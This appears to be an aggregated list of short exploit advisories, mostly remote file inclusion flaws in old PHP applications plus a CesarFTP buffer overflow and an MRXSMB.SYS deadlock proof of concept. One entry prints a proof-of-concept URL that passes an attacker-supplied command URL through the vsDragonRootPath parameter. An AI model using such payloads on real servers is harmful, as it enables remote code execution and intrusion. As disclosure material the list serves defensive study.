This exploit allows an attacker to include a remote file on the vulnerable server. It is triggered when the vulnerable application uses the phpbb_root_path parameter in the getmsg.php script without proper validation. This can be exploited to execute arbitrary PHP code by including a malicious file from a remote host.
Variables $mainpath are not properly sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.
Input passed to the 'templatefolder' parameter in various scripts isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.
This module exploits the buffer overflow found in the MKD command in CesarFTP 0.99g. It is required that the user be properly logged in before the exploit can be peformed.
Content*Builder is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation.
Error occured in template.php, line 23: require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php"); Proof of concept: http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/ (note this is with final slash (/))
The Bible Portal Project (destination) version 2.12 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.
This exploit is a proof-of-concept code for a deadlock vulnerability in the MRXSMB.SYS driver. It creates a thread that prints a message every second and then calls a malicious IOCTL to the driver, which causes a deadlock. The exploit was released in 2005 by Rubén Santamarta.
MyBibi is vulnerable to a remote command execution vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains malicious code which is then executed on the server. The malicious code is executed in the context of the web server process. This can allow an attacker to gain access to the server and execute arbitrary code.
Minerva (phpbb_root_path) version 2.0.8a Build 237 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a URL in the phpbb_root_path parameter that points to a malicious file hosted on a remote server. The malicious file is then executed on the vulnerable server.
Services By CQR